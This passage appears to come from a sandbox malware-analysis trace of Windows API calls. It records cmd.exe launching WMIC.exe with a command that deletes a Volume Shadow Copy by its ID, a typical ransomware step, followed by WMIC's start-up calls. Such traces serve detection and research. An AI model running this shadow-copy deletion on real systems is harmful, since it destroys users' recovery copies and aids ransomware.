0x35 [0101.643] GetProcessHeap () returned 0x3e0000 [0101.643] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe8) returned 0x3f9f90 [0101.647] GetProcessHeap () returned 0x3e0000 [0101.647] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f9f90, Size=0x7e) returned 0x3f9f90 [0101.647] GetProcessHeap () returned 0x3e0000 [0101.647] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f9f90) returned 0x7e [0101.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.648] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x22e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9f0) returned 0x3fa020 [0101.648] GetProcessHeap () returned 0x3e0000 [0101.648] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x0, Size=0x28) returned 0x3f46c0 [0101.648] FindClose (in: hFindFile=0x3fa020 | out: hFindFile=0x3fa020) returned 1 [0101.649] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0101.649] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0101.649] GetConsoleTitleW (in: lpConsoleTitle=0x22ef40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0101.650] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ecf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ecb8 | out: lpAttributeList=0x22ecf8, lpSize=0x22ecb8) returned 1 [0101.650] UpdateProcThreadAttribute (in: lpAttributeList=0x22ecf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x22eca8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ecf8, lpPreviousValue=0x0) returned 1 [0101.650] GetStartupInfoW (in: lpStartupInfo=0x22ee10 | out: lpStartupInfo=0x22ee10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0101.650] GetProcessHeap () returned 0x3e0000 [0101.650] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x20) returned 0x3f46f0 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0101.650] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0101.651] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0101.651] GetProcessHeap () returned 0x3e0000 [0101.651] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f46f0 | out: hHeap=0x3e0000) returned 1 [0101.651] GetProcessHeap () returned 0x3e0000 [0101.652] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x12) returned 0x3f8a30 [0101.652] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0101.653] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x22ed30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ece0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete", lpProcessInformation=0x22ece0*(hProcess=0x54, hThread=0x50, dwProcessId=0xa18, dwThreadId=0x9c8)) returned 1 [0101.663] CloseHandle (hObject=0x50) returned 1 [0101.663] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0101.663] GetProcessHeap () returned 0x3e0000 [0101.663] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fc360 | out: hHeap=0x3e0000) returned 1 [0101.663] GetEnvironmentStringsW () returned 0x3fad60* [0101.663] GetProcessHeap () returned 0x3e0000 [0101.663] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xae8) returned 0x3fb850 [0101.663] FreeEnvironmentStringsW (penv=0x3fad60) returned 1 [0101.663] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0103.393] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x22ec28 | out: lpExitCode=0x22ec28*=0x0) returned 1 [0103.393] CloseHandle (hObject=0x54) returned 1 [0103.394] _vsnwprintf (in: _Buffer=0x22ee98, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ec38 | out: _Buffer="00000000") returned 8 [0103.394] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0103.394] GetProcessHeap () returned 0x3e0000 [0103.394] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb850 | out: hHeap=0x3e0000) returned 1 [0103.394] GetEnvironmentStringsW () returned 0x3fad60* [0103.394] GetProcessHeap () returned 0x3e0000 [0103.394] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3fb880 [0103.394] FreeEnvironmentStringsW (penv=0x3fad60) returned 1 [0103.394] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0103.394] GetProcessHeap () returned 0x3e0000 [0103.394] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fb880 | out: hHeap=0x3e0000) returned 1 [0103.394] GetEnvironmentStringsW () returned 0x3fad60* [0103.394] GetProcessHeap () returned 0x3e0000 [0103.394] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb0e) returned 0x3fb880 [0103.394] FreeEnvironmentStringsW (penv=0x3fad60) returned 1 [0103.394] GetProcessHeap () returned 0x3e0000 [0103.394] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8a30 | out: hHeap=0x3e0000) returned 1 [0103.394] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ecf8 | out: lpAttributeList=0x22ecf8) [0103.394] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.394] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0103.395] _get_osfhandle (_FileHandle=1) returned 0x7 [0103.395] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0103.395] _get_osfhandle (_FileHandle=0) returned 0x3 [0103.395] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0103.395] SetConsoleInputExeNameW () returned 0x1 [0103.395] GetConsoleOutputCP () returned 0x1b5 [0103.395] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0103.395] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0103.395] exit (_Code=0) Process: id = "27" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x77569000" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0xa20" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 172 os_tid = 0x9c8 [0101.742] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff30 | out: lpSystemTimeAsFileTime=0x18ff30*(dwLowDateTime=0x44380a70, dwHighDateTime=0x1d68245)) [0101.742] GetCurrentProcessId () returned 0xa18 [0101.742] GetCurrentThreadId () returned 0x9c8 [0101.742] GetTickCount () returned 0x114f20d [0101.742] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff38 | out: lpPerformanceCount=0x18ff38*=22163486396) returned 1 [0101.745] GetModuleHandleW (lpModuleName=0x0) returned 0xff7c0000 [0101.745] __set_app_type (_Type=0x1) [0101.745] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff80ced0) returned 0x0 [0101.745] __wgetmainargs (in: _Argc=0xff832380, _Argv=0xff832390, _Env=0xff832388, _DoWildCard=0, _StartInfo=0xff83239c | out: _Argc=0xff832380, _Argv=0xff832390, _Env=0xff832388) returned 0 [0101.755] ??0CHString@@QEAA@XZ () returned 0xff832ab0 [0101.756] malloc (_Size=0x30) returned 0x495a50 [0101.756] malloc (_Size=0x70) returned 0x495a90 [0101.756] malloc (_Size=0x50) returned 0x497d30 [0101.756] malloc (_Size=0x30) returned 0x497d90 [0101.756] malloc (_Size=0x48) returned 0x497dd0 [0101.756] malloc (_Size=0x30) returned 0x497e20 [0101.756] malloc (_Size=0x30) returned 0x497e60 [0101.756] ??0CHString@@QEAA@XZ () returned 0xff832f58 [0101.756] malloc (_Size=0x30) returned 0x497ea0 [0101.756] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0101.756] SetConsoleCtrlHandler (HandlerRoutine=0xff805724, Add=1) returned 1 [0101.756] _onexit (_Func=0xff81f378) returned 0xff81f378 [0101.756] _onexit (_Func=0xff81f490) returned 0xff81f490 [0101.756] _onexit (_Func=0xff81f4d0) returned 0xff81f4d0 [0101.757] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.757] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0101.760] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0101.777] CoCreateInstance (in: rclsid=0xff7c73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff7c7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff832940 | out: ppv=0xff832940*=0x1d71390) returned 0x0 [0101.786] GetCurrentProcess () returned 0xffffffffffffffff [0101.786] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18fd00 | out: TokenHandle=0x18fd00*=0xf4) returned 1 [0101.786] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18fcf8 | out: TokenInformation=0x0, ReturnLength=0x18fcf8) returned 0 [0101.787] malloc (_Size=0x118) returned 0x4969a0 [0101.787] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x4969a0, TokenInformationLength=0x118, ReturnLength=0x18fcf8 | out: TokenInformation=0x4969a0, ReturnLength=0x18fcf8) returned 1 [0101.787] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x4969a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1893611536, Attributes=0x36b), (Luid.LowPart=0x0, Luid.HighPart=4816608, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0101.787] free (_Block=0x4969a0) [0101.787] CloseHandle (hObject=0xf4) returned 1 [0101.787] malloc (_Size=0x40) returned 0x497ee0 [0101.787] malloc (_Size=0x40) returned 0x497f30 [0101.787] malloc (_Size=0x40) returned 0x497f80 [0101.787] malloc (_Size=0x20a) returned 0x4969a0 [0101.787] GetSystemDirectoryW (in: lpBuffer=0x4969a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.787] free (_Block=0x4969a0) [0101.787] malloc (_Size=0x18) returned 0x2bdfb0 [0101.787] malloc (_Size=0x18) returned 0x4969a0 [0101.788] malloc (_Size=0x18) returned 0x4969c0 [0101.788] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0101.788] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0101.788] free (_Block=0x2bdfb0) [0101.788] free (_Block=0x4969a0) [0101.788] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0101.788] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0101.788] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.789] FreeLibrary (hLibModule=0x77940000) returned 1 [0101.789] free (_Block=0x4969c0) [0101.789] _vsnwprintf (in: _Buffer=0x497f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x18f928 | out: _Buffer="ms_409") returned 6 [0101.789] malloc (_Size=0x20) returned 0x4969a0 [0101.789] GetComputerNameW (in: lpBuffer=0x4969a0, nSize=0x18fd00 | out: lpBuffer="XDUWTFONO", nSize=0x18fd00) returned 1 [0101.789] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.789] malloc (_Size=0x14) returned 0x2bdfb0 [0101.789] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.789] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x18fcf8 | out: lpNameBuffer=0x0, nSize=0x18fcf8) returned 0x7fffffde000 [0101.790] GetLastError () returned 0xea [0101.790] malloc (_Size=0x40) returned 0x4969d0 [0101.790] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4969d0, nSize=0x18fcf8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18fcf8) returned 0x1 [0101.791] lstrlenW (lpString="") returned 0 [0101.791] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.791] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0101.792] lstrlenW (lpString=".") returned 1 [0101.792] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.792] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0101.792] lstrlenW (lpString="LOCALHOST") returned 9 [0101.792] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.792] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0101.792] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.792] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.792] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0101.792] free (_Block=0x2bdfb0) [0101.792] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.793] malloc (_Size=0x14) returned 0x2bdfb0 [0101.793] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.793] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.793] malloc (_Size=0x14) returned 0x496a20 [0101.793] lstrlenW (lpString="XDUWTFONO") returned 9 [0101.793] malloc (_Size=0x8) returned 0x496a40 [0101.793] malloc (_Size=0x18) returned 0x496a60 [0101.793] malloc (_Size=0x30) returned 0x496a80 [0101.793] malloc (_Size=0x18) returned 0x496ac0 [0101.793] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.793] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.793] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.793] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.793] malloc (_Size=0x30) returned 0x496ae0 [0101.793] malloc (_Size=0x18) returned 0x496b20 [0101.793] SysStringLen (param_1="IMPERSONATE") returned 0xb [0101.793] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.794] SysStringLen (param_1="IMPERSONATE") returned 0xb [0101.794] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.794] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.794] SysStringLen (param_1="IMPERSONATE") returned 0xb [0101.794] malloc (_Size=0x30) returned 0x496b40 [0101.794] malloc (_Size=0x18) returned 0x496b80 [0101.794] SysStringLen (param_1="DELEGATE") returned 0x8 [0101.794] SysStringLen (param_1="IDENTIFY") returned 0x8 [0101.794] SysStringLen (param_1="DELEGATE") returned 0x8 [0101.794] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.794] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0101.794] SysStringLen (param_1="DELEGATE") returned 0x8 [0101.794] malloc (_Size=0x30) returned 0x496ba0 [0101.794] malloc (_Size=0x18) returned 0x496be0 [0101.794] malloc (_Size=0x30) returned 0x496c00 [0101.794] malloc (_Size=0x18) returned 0x496c40 [0101.794] SysStringLen (param_1="NONE") returned 0x4 [0101.794] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.794] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.794] SysStringLen (param_1="NONE") returned 0x4 [0101.794] malloc (_Size=0x30) returned 0x496c60 [0101.795] malloc (_Size=0x18) returned 0x496ca0 [0101.795] SysStringLen (param_1="CONNECT") returned 0x7 [0101.795] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.795] malloc (_Size=0x30) returned 0x496cc0 [0101.795] malloc (_Size=0x18) returned 0x496d00 [0101.795] SysStringLen (param_1="CALL") returned 0x4 [0101.795] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.795] SysStringLen (param_1="CALL") returned 0x4 [0101.795] SysStringLen (param_1="CONNECT") returned 0x7 [0101.795] malloc (_Size=0x30) returned 0x496d20 [0101.795] malloc (_Size=0x18) returned 0x496d60 [0101.795] SysStringLen (param_1="PKT") returned 0x3 [0101.795] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.795] SysStringLen (param_1="PKT") returned 0x3 [0101.795] SysStringLen (param_1="NONE") returned 0x4 [0101.795] SysStringLen (param_1="NONE") returned 0x4 [0101.795] SysStringLen (param_1="PKT") returned 0x3 [0101.795] malloc (_Size=0x30) returned 0x496d80 [0101.796] malloc (_Size=0x18) returned 0x496dc0 [0101.796] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.796] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.796] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.796] SysStringLen (param_1="NONE") returned 0x4 [0101.796] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.796] SysStringLen (param_1="PKT") returned 0x3 [0101.796] SysStringLen (param_1="PKT") returned 0x3 [0101.796] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.796] malloc (_Size=0x30) returned 0x498000 [0101.797] malloc (_Size=0x18) returned 0x496de0 [0101.797] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0101.797] SysStringLen (param_1="DEFAULT") returned 0x7 [0101.797] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0101.797] SysStringLen (param_1="PKT") returned 0x3 [0101.797] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0101.797] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.797] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0101.797] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0101.797] malloc (_Size=0x30) returned 0x498040 [0101.797] malloc (_Size=0x40) returned 0x496e00 [0101.798] malloc (_Size=0x20a) returned 0x496e50 [0101.798] GetSystemDirectoryW (in: lpBuffer=0x496e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0101.798] free (_Block=0x496e50) [0101.798] malloc (_Size=0x18) returned 0x496e50 [0101.798] malloc (_Size=0x18) returned 0x496e70 [0101.798] malloc (_Size=0x18) returned 0x496e90 [0101.798] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0101.798] SysStringLen (param_1="\\wbem\\") returned 0x6 [0101.798] free (_Block=0x496e50) [0101.798] free (_Block=0x496e70) [0101.798] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0101.798] free (_Block=0x496e90) [0101.798] malloc (_Size=0x18) returned 0x496e50 [0101.798] malloc (_Size=0x18) returned 0x496e70 [0101.798] malloc (_Size=0x18) returned 0x496e90 [0101.798] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0101.798] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0101.799] free (_Block=0x496e50) [0101.799] free (_Block=0x496e70) [0101.799] GetCurrentThreadId () returned 0x9c8 [0101.799] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x18f600 | out: phkResult=0x18f600*=0xf8) returned 0x0 [0101.799] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x18f650, lpcbData=0x18f5f0*=0x400 | out: lpType=0x0, lpData=0x18f650*=0x30, lpcbData=0x18f5f0*=0x4) returned 0x0 [0101.799] _wcsicmp (_String1="0", _String2="1") returned -1 [0101.799] _wcsicmp (_String1="0", _String2="2") returned -2 [0101.799] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18f5f0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x18f5f0*=0x42) returned 0x0 [0101.799] malloc (_Size=0x86) returned 0x496eb0 [0101.799] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x496eb0, lpcbData=0x18f5f0*=0x42 | out: lpType=0x0, lpData=0x496eb0*=0x25, lpcbData=0x18f5f0*=0x42) returned 0x0 [0101.799] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0101.799] malloc (_Size=0x42) returned 0x496f40 [0101.799] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0101.799] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x18f650, lpcbData=0x18f5f0*=0x400 | out: lpType=0x0, lpData=0x18f650*=0x36, lpcbData=0x18f5f0*=0xc) returned 0x0 [0101.800] _wtol (_String="65536") returned 65536 [0101.800] free (_Block=0x496eb0) [0101.800] RegCloseKey (hKey=0x0) returned 0x6 [0101.800] CoCreateInstance (in: rclsid=0xff7c7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, 